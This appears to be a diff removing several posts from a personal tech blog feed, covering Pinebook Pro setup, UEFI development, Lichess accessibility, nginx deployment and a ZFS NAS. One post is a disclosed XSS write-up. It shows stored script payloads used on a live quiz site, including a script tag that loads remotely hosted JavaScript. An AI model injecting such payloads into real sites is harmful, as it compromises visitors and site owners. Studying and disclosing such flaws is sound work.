-I’m not sure if this is implemented in software or hardware.</p>
-
-<p>The speakers and very tin-y and do not sound good at all.
-That said, they look very replaceable, so I’ll look into a mod in the future.
-The Pinebook Pro comes with a headphone port, so you could just use that if the sound bothers you.</p>
-
-<h2 id="some-suggestions">Some suggestions</h2>
-
-<p>I had some issues when it first arrived.</p>
-
-<ol>
- <li>Reboot did not work. The display would glitch out and show horizontal lines. It would only work after a full shutdown.</li>
- <li>Booting would sometimes not work at all. My SD card would sometimes boot, sometimes not. eMMC would sometimes work and sometimes not. Sometimes I would even get to the login screen, or fully logged in before it decided to freeze/hang. I could “drop to console” (Ctrl+Alt+Fx), but it only made my mouse stop showing, it would not actually display a console. This problem was worse when not plugged in.</li>
- <li>Performance was not stellar, even for the RK3399.</li>
- <li>I don’t like the Manjaro logo that displays during boot.</li>
-</ol>
-
-<h3 id="dont-use-kde">Don’t use KDE</h3>
-
-<p>KDE for me is a bit slow.
-It is not a keyboard-driven desktop.
-To give it some credit though, it does at least have zoom support built in; this is something I wish other desktops would have enabled by default.
-I’m looking at your, Xfce.</p>
-
-<p>I switched to Manjaro Sway, which is a Wayland-based i3-like tiling window manager.
-I’ve used this on my Raspberry Pi 4, and it is by far my preference among other default distro configurations.</p>
-
-<p>This can be done by flashing an SD card with any random Linux distro, then download <a href="">Manjaro Sway ARM for the Pinebook Pro</a>.</p>
-
-<p>Quickly, we should prepare the eMMC. Open <code class="language-plaintext highlighter-rouge">fdisk</code> with your eMMC module and remove all partitions.
-If you have issues with this, check if any partition is mounted, unmount it, then try again.
-<code class="language-plaintext highlighter-rouge">fdisk</code> is well documented elsewhere, so I won’t cover it here.</p>
-
-<p>Once your .xz file is downloaded, <code class="language-plaintext highlighter-rouge">unxz</code> the .xz file downloaded.</p>
-
-<pre class="terminal">
-$ cd ~/Downloads
-$ unxz Manjaro-Sway-ARM-pbp-20.10.img.xz
-</pre>
-
-<p>Not exactly those commands, but close.</p>
-
-<p>Once you have that, flash your eMMC by using <code class="language-plaintext highlighter-rouge">dd</code>.</p>
-
-<pre class="terminal">
-# dd if=./Manjaro-Sway-ARM-pbp-20.10.img of=/dev/mmcblkX bs=1M conv=fsync
-</pre>
-
-<p>Now remove your SD card.
-U-Boot will prefer your SD card over your eMMC, so if you leave it in, it <em>will</em> boot to your SD card.</p>
-
-<h3 id="flash-your-u-boot-bsp">Flash Your U-Boot (BSP)</h3>
-
-<p>U-Boot appeared to be the solution to my other two issues.
-I was able to flash a new U-Boot program by using the following commands.
-Be sure to run <code class="language-plaintext highlighter-rouge">lsblk</code> beforehand to know which <code class="language-plaintext highlighter-rouge">/dev/emmcblk</code> to write to.
-Replace <code class="language-plaintext highlighter-rouge">X</code> with the correct number for your system.</p>
-
-<pre class="terminal">
-# pacman -S uboot-pinebookpro-bsp
-# dd if=/boot/idbloader.img of=/dev/mmcblkX seek=64 conv=notrunc
-# dd if=/boot/uboot.img of=/dev/mmcblkX seek=16384 conv=Notrunc
-# dd if=/boot/trust.img of=/dev/mmcblkX seek=24576 conv=notrunc
-</pre>
-
-<p>The <code class="language-plaintext highlighter-rouge">dd</code> instructions are printed out after installing the <code class="language-plaintext highlighter-rouge">uboot-pinebookpro-bsp</code> package, so make sure to follow what is printed there if it is different that what I have provided.</p>
-
-<p>After doing this, not only have I since booted 100% of the time,
-but my display now works correctly after a reboot without a full shutdown.</p>
-
-<p>Whew! Looking good!!!</p>
-
-<h3 id="maybe-get-some-of-the-accessories">Maybe get some of the accessories</h3>
-
-<p>I didn’t buy any accessories from Pine64.
-I regret this somewhat.
-For one thing, without an accessory to read the eMMC over USB, you need to have a working Linux distro on the SD card to get anywhere with it.
-Flashing directly to the eMMC would have saved me a <em>lot</em> of time.</p>
-
-<p>The other accessory I could see the occasional use for is the Ethernet adapter.
-When downloading a big update (1GB+), it could be useful to wire in just temporarily.
-Not a huge deal, but worth mentioning.</p>
-
-<p>I would also be interested in the other batteries they have available.
-Even though it comes with a battery, and I also don’t think you can install a second one, I would be interested to see if I could get more life out of it with an improved battery.
-If this is a standard battery (Pine64 tends to use standard parts), then I would consider getting it from a supplier as well.</p>
-
-<p>The Pinebook Pro does not come with any HDMI ports.
-It comes with a USB type-C port that can be adapted to HDMI.
-Or you can get a display that supports USB type-C.
-I do not have a display that supports USB type-C, so it might be worth it for me to buy an adapter or find a compatible one more locally.
-Shipping from Hong Kong ain’t cheap.</p>
-
-<h3 id="replace-the-boot-logo">Replace the boot logo</h3>
-
-<p>The boot splash screen can be replaced, but I haven’t figured out how yet.
-I will post an update to the blog when I do find out.</p>
-
-<h2 id="conclusion">Conclusion</h2>
-
-<p>I really want to use the Pinebook Pro more.
-Pine64 do a lot for the open-source community and they do their best to use only open hardware.
-They do fail in some respects, but they do much better than the mainline distributors like Dell, HP or ASUS.</p>
-
-<p>Thanks, Pine64! I’m excited to use your products!</p>
-
-<p>Happy ARM hacking :)</p>I recently got my Pinebook Pro. It was more expensive than I was expecting, coming in at (including shipping and handling) C$335. I always forget the exchange rate and assume it’s similar to the U.S. dollar, but it never is, haha! Anyway, this is just my first impressions and what I did to fix a few issues.UEFI Development On x86 With EDK22021-04-18T00:00:00-06:002021-04-18T00:00:00-06:00http://localhost:4000/2021/04/18/uefi-development-environment<p>I made this blog so I could remember how to do stuff that had instructions spread around the internet.
-So here is how I setup my environment for developing EFI applications.</p>
-
-<h2 id="requirements">Requirements</h2>
-
-<p>On Artix or other Arch-based distros like Manjaro I installed the following packages: <code class="language-plaintext highlighter-rouge">gcc nasm iasl</code></p>
-
-<p>Here is what the packages do:</p>
-
-<ul>
- <li>GCC is obviously the GNU Compiler Collection and it allows us to compile C code to machine code.</li>
- <li>NASM stands for Netwide Assembler. It is an assembler and disassembler for 32 and 64 bit Intel x86 platforms.</li>
- <li>IASL stands for the ACPI Source Language Compiler/Decompiler. This will compile any ACPI calls to our local machine’s code.</li>
-</ul>
-
-<p>We need all these packages to start our (U)EFI journey.
-Now that these are installed, let’s setup our environment.</p>
-
-<h2 id="building-edk2">Building EDK2</h2>
-
-<p>I used the stable/202011 branch as that is latest stable version of the EDK2 project.</p>
-
-<p>So first let’s pull the project:</p>
-
-<p><code class="language-plaintext highlighter-rouge">git clone https://github.com/tianocore/edk2.git</code></p>
-
-<p>Now, let’s fetch the tags and switch to the latest stable version:</p>
-
-<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>cd edk2
-git fetch
-git checkout stable/202011
-</code></pre></div></div>
-
-<p>Perfect! We’re on stable now! Let’s grab all our submodules: <code class="language-plaintext highlighter-rouge">git submodule update --init</code></p>
-
-<p>This will take a bit the first time you do it. But no fear, once that’s done, we can finally build the base tools.</p>
-
-<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>make -C BaseTools
-export EDK_TOOLS_PATH=$HOME/Documents/edk2/BaseTools
-. edksetup.sh BaseTools
-</code></pre></div></div>
-
-<p>Notice we source a file with <code class="language-plaintext highlighter-rouge">.</code> before continuing. This is needed to load some tools and options into our shell for later. The environment variable <code class="language-plaintext highlighter-rouge">EDK_TOOLS_PATH</code> is set so that EDK knows where to find itself later. Now that everything is loaded up, we can modify a config file located at <code class="language-plaintext highlighter-rouge">Conf/target.txt</code>.</p>
-
-<p>The most important options are these, feel free to append them to the end of the file; there is no default value for them.</p>
-
-<pre class="file">
-ACTIVE_PLATFORM = MdeModulePkg/MdeModulePkg.dsc
-TOOL_CHAIN_TAG = GCC5
-# for 64-bit development
-TARGET_ARCH = X64
-# for 32-bit development
-TARGET_ARCH = IA32
-# for 32 and 64-bit development
-TARGET_ARCH = IA32 X64
-
-# set multithreading to 1 + (2 x # of cores)
-MAX_CONCURRENT_THREAD_NUMBER = 9
-</pre>
-
-<p>There are other options, but I don’t know about them much, so I’m just sticking with this for now.</p>
-
-<p>Finally, after all this work, we can build some .efi files. Let’s compile the <code class="language-plaintext highlighter-rouge">Helloworld.efi</code> file!
-Simply run the <code class="language-plaintext highlighter-rouge">build</code> command in the terminal.
-You can find your compiled EFI files by running this <code class="language-plaintext highlighter-rouge">ls</code> command:</p>
-
-<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>ls Build/MdeModule/DEBUG_*/*/HelloWorld.efi
-</code></pre></div></div>
-
-<p>This will show all HelloWorld.efi files for all architectures and toolchains (if you decide to change them).</p>
-
-<h2 id="running-in-uefi-shell">Running In UEFI Shell</h2>
-
-<p>Once all this is complete, you will want to run your EFI files.
-To do so, let’s first add an EFI shell to use at boot.
-This will appear as an option in your bootloader, like GRUB, which is what I will show documentation for in this article.</p>
-
-<p>So, first thing is first,
-<a href="https://github.com/tianocore/edk2/blob/UDK2018/ShellBinPkg/UefiShell/X64/Shell.efi?raw=true">download and EFI shell file</a>.
-Second, move it to a partition (FAT formatted) which can be used for the UEFI.
-On my Linux system, this is /boot. On others there may be no FAT filesystem so attach a USB and format it as FAT.
-Third, add the <code class="language-plaintext highlighter-rouge">EFI Shell</code> option to your grub boot file.
-Substitute hdX with the right hard drive (I did it with trial and error) as when it doesn’t work I would hit ‘e’ on grub and add the <code class="language-plaintext highlighter-rouge">ls</code> GRUB command.
-Substitute the gptX with the correct partition, or msdosX if it is a DOS formatted partition table.
-My <code class="language-plaintext highlighter-rouge">Shell.efi</code> was placed in /boot/EFI/.</p>
-
-<p><label>/etc/grub.d/40_custom</label></p>
-<pre class="file">
-menuentry "EFI Shell" {
- insmod part_gpt
- insmod chain
- insmod fat
- set root='(hd4,gpt2)'
- chainloader /EFI/Shell.efi
-}
-</pre>
-
-<p>Now regenerate your grub configuration file with <code class="language-plaintext highlighter-rouge">grub-update</code> (Debian-based) or <code class="language-plaintext highlighter-rouge">grub-mkconfig -o /boot/grub/grub.cfg</code> (Other).</p>
-
-<p>You’ll know if your shell is working if you see the following text on boot into the EFI shell:</p>
-
-<pre class="terminal">
-UEFI Interactive Shell v2.1
-EDK II
-UEFI v2.4 (EDI II, 0x000100000)
-Mapping table:
- ...
-Shell>
-</pre>
-
-<h2 id="running-hello-world">Running Hello World</h2>
-
-<p>When we run our <code class="language-plaintext highlighter-rouge">ls</code> command from earlier, remember we saw our <code class="language-plaintext highlighter-rouge">HelloWorld.efi</code> file.
-Let’s move this file somewhere useful, like for me, <code class="language-plaintext highlighter-rouge">/boot</code>.
-Then, once we’re in our UEFI shell we can run commands:</p>
-
-<pre class="terminal">
-Shell> .\HelloWorld.efi
-UEFI Hello World!
-Shell>
-</pre>
-
-<p>And that… All that is how you set up a UEFI development environment.</p>
-
-<h2 id="conclusion">Conclusion</h2>
-
-<p>This took me a long time to figure out.
-I needed to scrounge resources from around the internet,
-and I had to look at my config files for hours to make sure that I hadn’t missed a step that I did without thinking.
-I hope this will be useful to you and my future self.</p>
-
-<p>Happy UEFI hacking :)</p>I made this blog so I could remember how to do stuff that had instructions spread around the internet. So here is how I setup my environment for developing EFI applications.The “Quiz Your Friends” XSS Exploit2021-04-04T00:00:00-06:002021-04-04T00:00:00-06:00http://localhost:4000/2021/04/04/quiz-your-friends-xss<p>Note: I have alerted the administrators of this site multiple times about this vulnerability.
-One email was sent many years ago, which is more than enough time for <a href="https://en.wikipedia.org/wiki/Responsible_disclosure">responsible disclosure</a>.</p>
-
-<p>Update: They have fixed the vulnerability as of the day of release for this article.</p>
-
-<h2 id="background">Background</h2>
-
-<p>In early 2014, when my “programming” skills consisted of editing web pages with inspect element, I was sent a link from an old friend in a town about 3 hours away.
-This was a link to a quiz about them.
-I had to answer as many questions right as I could about them and I got a score at the end based on my answers.
-It seemed fun enough, so I went for it.
-In the following weeks this quiz website became quite a trend amongst my friend group as we all started making quizes to see how well we all knew eachother.</p>
-
-<p>A few weeks into this trend, I was staying at a friends’ place and told him about this site,
-so he goes and creates his own quiz and sends it to all his friends, group chats, Google Plus groups, et cetera.</p>
-
-<h2 id="hackerman">Hackerman</h2>
-
-<p>While filling in my friend’s survey I thought it would be
-funny for them to know it is me without anyone else knowing.
-We were young and had <code class="language-plaintext highlighter-rouge">Inspect Element</code>ed a few things together,
-so it was a safe bet that an HTML joke would let them know.</p>
-
-<p>I decided to write my name like so: <code class="language-plaintext highlighter-rouge"><b>Steve</b></code>.
-Steve is in reference to the <a href="https://minecraft.gamepedia.com/Player">main character</a> in the video game Minecraft.</p>
-
-<figure>
- <img src="/assets/img/qyf-xss/2-bold.png" />
- <figcaption>
- <p>Me typing in my name as <span class="mono"><b>Steve</b></span>.</p>
- </figcaption>
-</figure>
-
-<p>Now in theory this should have shown in in the leaderboard as: “<b>Steve</b>”
-However, to my horror and excitement, I saw this in the leaderboard:</p>
-
-<figure>
- <img src="/assets/img/qyf-xss/3-steve-board.png" />
- <figcaption>
- <p><span class="mono"><b>Steve</b></span> displaying in the leaderboard as bold text: <b>Steve</b></p>
- </figcaption>
-</figure>
-
-<p>The text “Steve” showed up <strong>in bold</strong> on the leaderboard.
-This told me all I needed to know.
-How did this happen? You might wonder.</p>
-
-<h3 id="server-side-validation">Server-Side Validation</h3>
-
-<p>Here is a great demonstration why you should do most of your validation on the server side.
-As a user, I can edit any of the HTML, CSS, or Javascript your server serves to me.</p>
-
-<p>Quiz your friends uses the <code class="language-plaintext highlighter-rouge">maxlength=20</code> HTML attribute on the name input field.
-Imagine trying to fit in a script tag doing anything useful with 20 characters! Don’t forget that includes the <code class="language-plaintext highlighter-rouge"><script></code> tag.
-That would leave 13 characters for Javascript.
-Although I’m sure a genius would be able to <a href="https://code.golf/">code golf</a> that, I know I couldn’t.</p>
-
-<p>Now obviously I can edit any HTML that a server has sent to me.
-If I open up my inspect element window, I can go ahead and change that <code class="language-plaintext highlighter-rouge">maxlength</code> attribute to anything I want.
-Let’s change it to 100!</p>
-
-<figure>
- <img src="/assets/img/qyf-xss/5-maxlength.png" alt="An image of the Quiz Your Friends name input field with inspect element. THe code reads: <font class="style6"><input class="inputbutton" name="takername" type="text" id="takername" maxlength="20" width="425" placeholder="Your First Name" style="text-align: center; text-decoration:inherit; font-size:38px;" tabindex="-1"></font>" />
- <figcaption>
- Manually changing the maxlength attribute.
- </figcaption>
-</figure>
-
-<p>In theory, there is a way that a site can stop people from just putting in their name of any length: server-side validation.
-The server <em>could</em> check to see if the input is too long and reject it if it is.
-The Quiz My Friends server has <em>no such checks in place</em>.
-Therefore, I can send an almost arbitrary load to them.
-Being able to send something potentially very large (more than a few megabytes) is a vulnerability of its own.
-Imagine being able to send entire executable programs as your “name” in one of these quizzes?</p>
-
-<h2 id="javascript">Javascript</h2>
-
-<p>So I went on my merry way thinking about ways to use malicious javascript.
-Then, I thought that might be mean, so I decided to warn users instead.
-I filled in the name with a script tag and a call to <code class="language-plaintext highlighter-rouge">alert()</code> to warn the user about this site.
-I edited the max-length attribute to allow me to type a long string like this:</p>
-
-<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code><script>alert("Don't use this site. It is not secure!");</script>
-</code></pre></div></div>
-
-<p>Sure enough, I got a text from my friend saying: “Tait! I know this is you, why would you do that!”
-A bit salty, but who wouldn’t be.</p>
-
-<h2 id="cross-site-scripting-xss">Cross-Site Scripting (XSS)</h2>
-
-<p>As my final act, I decided to use a cross-site script that I could edit and have it load with new changes at any time.</p>
-
-<p>I set this as my name:</p>
-
-<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code><script src="https://tait.tech/assets/js/hacked.js"></script>
-</code></pre></div></div>
-
-<p>This script pops up a warning, telling the user that the site is insecure and it is now redirecting to an article about the attack.
-This script redirects to an <a href="https://tait.tech/2020/04/25/xss/">older post I made</a> about how XSS works.</p>
-
-<h2 id="conclusion">Conclusion</h2>
-
-<p>Watch out for sketchy websites that may be vulnerable to malicious or insecure sites which are ripe for abuse.
-Always check that you are using an encrypted connection, HTTPS.
-And if you see any messages warning you that a site is not secure and redirecting you to some random site…
-Take their info with a grain of salt.</p>
-
-<p>Happy Hacking, literally :)</p>Note: I have alerted the administrators of this site multiple times about this vulnerability. One email was sent many years ago, which is more than enough time for responsible disclosure.Lichess Accessibility2021-01-31T00:00:00-07:002021-01-31T00:00:00-07:00http://localhost:4000/2021/01/31/lichess<p>I wanted to play chess with somebody who used a screen reader, without requiring a screen reader myself;
-some sites, like QuintenC’s Playroom have a rather poor visual interface for anyone who would like the play the game visually.
-<a href="https://lichess.org">Lichess</a> is an free and open-source website for chess players;
-it bridges this gap by having two “modes” on the site:
-standard mode and accessibility mode.</p>
-
-<h2 id="accessibility-mode">Accessibility Mode</h2>
-
-<p>Accessibility mode is far from perfect on lichess.org.
-That said, the idea to separate the sites into different modes was a good call.
-It stops the inevitable “this would work well for screen readers but cause visual issues” shenanigans,
-or, vice-verse “this looks great but it might be weird with a screen reader”.
-This way all the things which affect the visual interface are in one place,
-and all things which affect the non-visual user interface (NVUI) are written in another.</p>
-
-<p>In my quest to play chess with visual and non-visual players with both having optimal experiences, I tried Lichess with my friend from <a href="https://melly.tech/">melly.tech</a>.
-She pointed out that the method to interface with the board previously was rather poor.
-This is because it required an “enter” at the end of each command and the commands tended to read out a row or column of a chessboard not just an individual square.</p>
-
-<p>For example, to list all pieces (or lack thereof) on the e file, I would type the command:</p>
-
-<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>s e
-</code></pre></div></div>
-
-<p>Although this seems good in theory, and it’s great when you need an entire file, there was no way to get only one square.
-In addition, imagine typing to navigate around the board:</p>
-
-<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>s e1
-s f1
-s e2
-</code></pre></div></div>
-
-<p>For the inexperienced player, it seems to be more convenient to bind some keys and have the user bounce to various buttons, which they can push to say “I want to move this piece”.
-This is what I was told anyway.
-So I want to work making a system so you could use the following basic keys:</p>
-
-<ul>
- <li>left/right/up/down arrow: move on the board.</li>
- <li>k/q/r/b/n/p: move to next piece represented by its character in chess notation.</li>
- <li>shift + k/q/r/b/n/p: move back to the last piece represented by its character in chess notation.</li>
- <li>click/enter/space: select piece to move.</li>
- <li>click/enter/space again: move piece here.</li>
- <li>m: show where I can move with this piece.</li>
- <li>shift+m: show where I can capture with this piece.</li>
- <li>1-8: move to rank 1-8; stay on same file.</li>
- <li>shift + 1-8: move to file a-h; stay on same rank.</li>
-</ul>
-
-<p>This gives a pretty solid basis for playing the game.
-One caveat is after you have moved a pawn all the way to the farthest rank, only the destination tile will accept your promotion choice.
-Therefore, all the other keys still work on other square, but if you are on the destination square of a promotion q/r/b/n will promote your piece, not jump you to the next/previous one.</p>
-
-<p>This pull request was merged earlier this month:</p>
-
-<h2 id="more-to-come">More To Come</h2>
-
-<p>Next thing I want to do is implement the analysis board.
-Right now it is not accessible whatsoever.</p>
-
-<h2 id="help-me">Help Me</h2>
-
-<p>If you are a screen reader user or know about accessibility and want to help make Lichess an awesome chess site for sighted and unsighted players alike,
-then send me an email at <a href="mailto:tait@tait.tech">tait@tait.tech</a> and I’ll BCC you once I start testing the analysis board.</p>
-
-<p>Happy hacking, y’all!</p>I wanted to play chess with somebody who used a screen reader, without requiring a screen reader myself; some sites, like QuintenC’s Playroom have a rather poor visual interface for anyone who would like the play the game visually. Lichess is an free and open-source website for chess players; it bridges this gap by having two “modes” on the site: standard mode and accessibility mode.How to Deploy Lichess’s Lila With Nginx2020-12-20T00:00:00-07:002020-12-20T00:00:00-07:00http://localhost:4000/2020/12/20/deploy-lichess<p>I was getting ready to have a public test of some changes I made to <a href="https://lichess.org">lichess.org</a>’s <a href="https://lichess.org/source">open source chess platform</a>.
-In preperation, I got my Let’s Encrypt certificates and nginx configurations setup…
-and it wouldn’t work.
-Here are some tips for myself and future Lichess developers.</p>
-
-<h2 id="reasoning">Reasoning</h2>
-
-<p>My pull request involves accessibility.
-It will extend Lichess’s NVUI (Non-Visual User Interface) to be more accessible to beginner level chess players.
-At the time of writing this, Lichess’s NVUI only supports searching pieces by type, rank and file.
-It does not support any kind of interactive board.</p>
-
-<p>I wanted to play chess with a friend of mine who uses a screen reader.
-Even though Lichess does indeed have a separate rendering of the page for visually impaired users,
-I have heard from a few people that it is not the best.</p>
-
-<p>I don’t use a screen reader myself, so I thought having a public latest changes deployed server would work better for testing.
-It would certainly work better than getting some of my less computer literate friends to connect to me via VSCode/VPN and view my local repository.</p>
-
-<p>So here is how to deploy it:</p>
-
-<h2 id="setup-a-development-environment">Setup a development environment</h2>
-
-<p>This is described <a href="https://github.com/ornicar/lila/wiki/Lichess-Development-Onboarding">in Lichess’s documentation itself</a>.
-I will not elaborate further as it is not necessary.</p>
-
-<h2 id="setup-nginx">Setup nginx</h2>
-
-<p>This is the part that stumps most people.
-Getting a local development server usually works alright, but once you want to reverse proxy it for security and professionalism purposes, it get more interesting.</p>
-
-<p>Here is the relevant portion of my nginx configuration for lila:</p>
-
-<pre class="file">
-server_name chess.tait.tech;
-
-location / {
- proxy_pass http://127.0.0.1:9663;
- proxy_set_header Host $host;
- proxy_set_header X-Forwarded-For $proxy_add_x_forwarded_for;
- proxy_set_header X-NginX-Proxy true;
- proxy_set_header X-Real-IP $remote_addr;
-}
-</pre>
-
-<p>This is the config for the lila-ws websocket subdomain:</p>
-
-<pre class="file">
-server_name ws.chess.tait.tech;
-
-location / {
- proxy_pass http://127.0.0.1:9664;
- proxy_http_version 1.1;
- proxy_set_header Upgrade $http_upgrade;
- proxy_set_header Connection "upgrade";
-}
-</pre>
-
-<p>You will need to deploy these on two virtual hosts.</p>
-
-<h2 id="lila">Lila</h2>
-
-<p><a href="https://github.com/ornicar/lila/">Lila</a> is the name for the main chess server, we need to change a few settings. Here is my git diff for the <code class="language-plaintext highlighter-rouge">conf/base.conf</code> file:</p>
-
-<pre class="file">
-- domain = "localhost:9663"
-- socket.domains = [ "localhost:9664" ]
-+ domain = "chess.tait.tech"
-+ socket.domains = [ "ws.chess.tait.tech" ]
- asset.domain = ${net.domain}
-- asset.base_url = "http://"${net.asset.domain}
-+ asset.base_url = "https://"${net.asset.domain}
- asset.minified = false
-- base_url = "http://"${net.domain}
-+ base_url = "https://"${net.domain}
-</pre>
-
-<h3 id="lila-ws">Lila-ws</h3>
-
-<p><a href="https://github.com/ornicar/lila-ws/">Lila-ws</a> is the websocket component of Lila.</p>
-
-<p>The most common complaint amongst aspiring Lichess developers is websockets not working.
-They constantly get these ‘101’ responses from the websocket,
-and it also seems that the websocket returns instead of staying in the ‘pending’ state as it should be.</p>
-
-<p>Here is how to fix that (in diff format):</p>
-
-<pre class="file">
--csrf.origin = "http://127.0.0.1:9000"
-+csrf.origin = "https://chess.tait.tech"
-</pre>
-
-<p>You need to tell lila-ws where the websocket requests will be coming from. This is how to do that.</p>
-
-<h2 id="conclusion">Conclusion</h2>
-
-<p>This is not a long article, but just some notes for future me and Lila developers.</p>I was getting ready to have a public test of some changes I made to lichess.org’s open source chess platform. In preperation, I got my Let’s Encrypt certificates and nginx configurations setup… and it wouldn’t work. Here are some tips for myself and future Lichess developers.Getting Pacaur Working on a Raspberry Pi 4 with Manjaro ARM or Arch Linux2020-12-01T00:00:00-07:002020-12-01T00:00:00-07:00http://localhost:4000/2020/12/01/pacaur-rpi<p>I recently installed Manjaro ARM (based on Arch Linux ARM) on a Raspberry Pi 4.
-I used some standard commands to start to add the <code class="language-plaintext highlighter-rouge">pacaur</code> package so I can easily retrieve <a href="https://wiki.archlinux.org/index.php/Arch_User_Repository">AUR packages</a> without needing to do it manually.
-Unfortunately, there is a small problem with compiling this on ARM.</p>
-
-<h2 id="always_inline">always_inline</h2>
-
-<p>To setup the install for <code class="language-plaintext highlighter-rouge">pacaur</code>, I first needed to download <a href="https://aur.archlinux.org/packages/auracle-git">auracle-git</a> AUR package manually.
-I ran into an error when compiling this package.</p>
-
-<p>But first, my setup:</p>
-<pre class="terminal">
-$ git clone https://aur.archlinux.org/auracle-git
-$ cd auracle-git
-$ makepkg -sri
-</pre>
-
-<p>Around half way through compiling this project, I got this cryptic message telling me there was a “target specific option mismatch”…Whatever that means.
-The full error is below, hopefully that helps my chances on the search engines.</p>
-
-<pre class="terminal">
-In file included from ../subprojects/abseil-cpp-20200225.2/absl/random/internal/randen_hwaes.cc:225:
-/usr/lib/gcc/aarch64-unknown-linux-gnu/9.3.0/include/arm_neon.h: In function 'Vector128 {anonymous}::AesRound(const Vector128&, const Vector128&)':
-/usr/lib/gcc/aarch64-unknown-linux-gnu/9.3.0/include/arm_neon.h:12452:1: error: inlining failed in call to always_inline 'uint8x16_t vaesmcq_u8(uint8x16_t)': target specific option mismatch
-12452 | vaesmcq_u8 (uint8x16_t data)
-</pre>
-
-<p>Luckily, there is a very easy fix for this.
-The user redfish <a href="https://aur.archlinux.org/packages/auracle-git#comment-762117">helpfully pointed out</a>
-on the <code class="language-plaintext highlighter-rouge">auracle-git</code> package page that you need to add a special make option to your <code class="language-plaintext highlighter-rouge">/etc/make.conf</code> file to make this work.</p>
-
-<p>His solution, as commented is like so:</p>
-
-<blockquote>
- <p>If you get this error when building for ARM aarch64:</p>
-
- <p>(insert error message from before)</p>
-
- <p>Then check that in /etc/makepkg.conf CFLAGS and CXXFLAGS have the +crypto suffix in -march flag, like -march=armv8-a+crypto (the base identifier may very depending on your hardware)</p>
-</blockquote>
-
-<p>Basically, there is a file on Linux: <code class="language-plaintext highlighter-rouge">/etc/makepkg.conf</code> which tells your computer how to compile <em>all</em> programs on the system.
-By default the Manjaro ARM (RPi4) edition has the following relevant lines in <code class="language-plaintext highlighter-rouge">makepkg.conf</code>.</p>
-
-<pre class="file">
-CFLAGS="-march=armv8-a -O2 -pipe -fstack-protector-strong -fno-plt"
-CXXFLAGS="-march=armv8-a -O2 -pipe -fstack-protector-strong -fno-plt"
-</pre>
-
-<p>What Mr. redfish is telling us is that we must add ‘+crypto’ to the end of the -march compiler flag so that our compiler will know how to inline that pesky vaesmcq_u8 function.</p>
-
-<p>So in the end, your <code class="language-plaintext highlighter-rouge">makepkg.conf</code>’s relevant lines will look like so:</p>
-<pre class="file">
-CFLAGS="-march=armv8-a+crypto -O2 -pipe -fstack-protector-strong -fno-plt"
-CXXFLAGS="-march=armv8-a+crypto -O2 -pipe -fstack-protector-strong -fno-plt"
-</pre>
-
-<h2 id="why">Why?</h2>
-
-<p>Redfish continues:</p>
-
-<blockquote>
- <p>Build of abseil-cpp package works because it uses CMake which adds the correct -march flag regardless of makepkg.conf, whereas when abseil-cpp is build as a subproject within this package, it uses meson, which does not add the flag and thus fails with the above error.</p>
-</blockquote>
-
-<p>In other words, one of the dependencies pulled in with auracle is not compiling without this special compiler flag enabled.</p>
-
-<h2 id="conclusion">Conclusion</h2>
-
-<p>Thanks to redfish for posting this solution to the forums!
-Would’ve been quite the rabbit hole for me to figure out how to do that.
-In fact, it is very likely I would have never figured that one out.</p>
-
-<p>After this issue is resolved, the installation of <code class="language-plaintext highlighter-rouge">pacaur</code> goes as expected. Nice and easy!
-Pacuar will compile on any architecture so it’s smooth sailing from here.</p>
-
-<p>Happy hacking!</p>I recently installed Manjaro ARM (based on Arch Linux ARM) on a Raspberry Pi 4. I used some standard commands to start to add the pacaur package so I can easily retrieve AUR packages without needing to do it manually. Unfortunately, there is a small problem with compiling this on ARM.ZFS NAS Box, Part 22020-11-15T00:00:00-07:002020-11-15T00:00:00-07:00http://localhost:4000/2020/11/15/nas2<p>Back in <a href="/2020/04/12/nas1/">part one of my NAS project</a> I discussed how I wanted to set up my hardware.
-Today, I set up the NAS (almost).</p>
-
-<p>There were some hiccup along the way, like learning that M.2 slots can disable some of your SATA ports or waiting a month for a host bus adapter to come in from China.</p>
-
-<h2 id="why-did-it-take-so-long">Why Did It Take So Long</h2>
-
-<p>So it turns out I was going to spend a lot more on this project than I originally anticipated.
-I ended up getting a server machine instead of a sleek NAS box.
-Here are some of the quick specs:</p>
-
-<ul>
- <li>Standard ATX case by Thermaltake.</li>
- <li>LSI 9211-8i.</li>
- <li>The cheapest HDMI graphics card I could find on Kijiji.</li>
- <li>6x 3TB Segate HDDs.</li>
- <li>1x 250G Kingston SSD.</li>
- <li>AMD Ryzen 5 3600.</li>
- <li>MSI B450 Gaming Plus Max.</li>
- <li>2x 8GB FlareX 3200Mhz RAM.</li>
- <li>1x 16GB Kingston 3200Mhz RAM.</li>
-</ul>
-
-<h2 id="zfs">ZFS</h2>
-
-<p>This is how I decided to configure my storage pools.
-In hindsight, this was not the best choice for upgrading.
-I may change it in the future to a 0+1 setup, but it works for now.</p>
-
-<p>I have 5x 3TB in a RAIDZ2 with one drive not attached for redundancy’s sake.
-How does one setup a ZFS pool. Check this out:</p>
-
-<pre class="terminal">
-# zpool create poolname raidz2 \
-/dev/by-id/blahblahblah1 \
-/dev/by-id/blahblahblah2 \
-/dev/by-id/blahblahblah3 \
-/dev/by-id/blahblahblah4 \
-/dev/by-id/blahblahblah5
-</pre>
-
-<p>And zippidy-doo! We’ve got a ZFS pool!
-We can check its status with <code class="language-plaintext highlighter-rouge">zpool status</code>.</p>
-
-<pre class="terminal">
-$ zfs status
- pool: raid
- state: ONLINE
- scan: scrub in progress since Wed Nov 18 18:41:41 2020
- 1.84T scanned at 8.51G/s, 121G issued at 562M/s, 1.84T total
- 0B repaired, 6.45% done, 0 days 00:53:25 to go
-config:
-
- NAME STATE READ WRITE CKSUM
- raid ONLINE 0 0 0
- raidz2-0 ONLINE 0 0 0
- ata-HGST_HUS724030ALA640_PN2234P8JTNMYY ONLINE 0 0 0
- ata-HGST_HUS724030ALA640_PN2234P8JVSXTY ONLINE 0 0 0
- ata-HGST_HUS724030ALA640_PN2234P8JXAS8Y ONLINE 0 0 0
- ata-HGST_HUS724030ALA640_PN2234P8JXBARY ONLINE 0 0 0
- ata-HGST_HUS724030ALA640_PN2234P8JXP77Y ONLINE 0 0 0
-
-errors: No known data errors
-</pre>
-
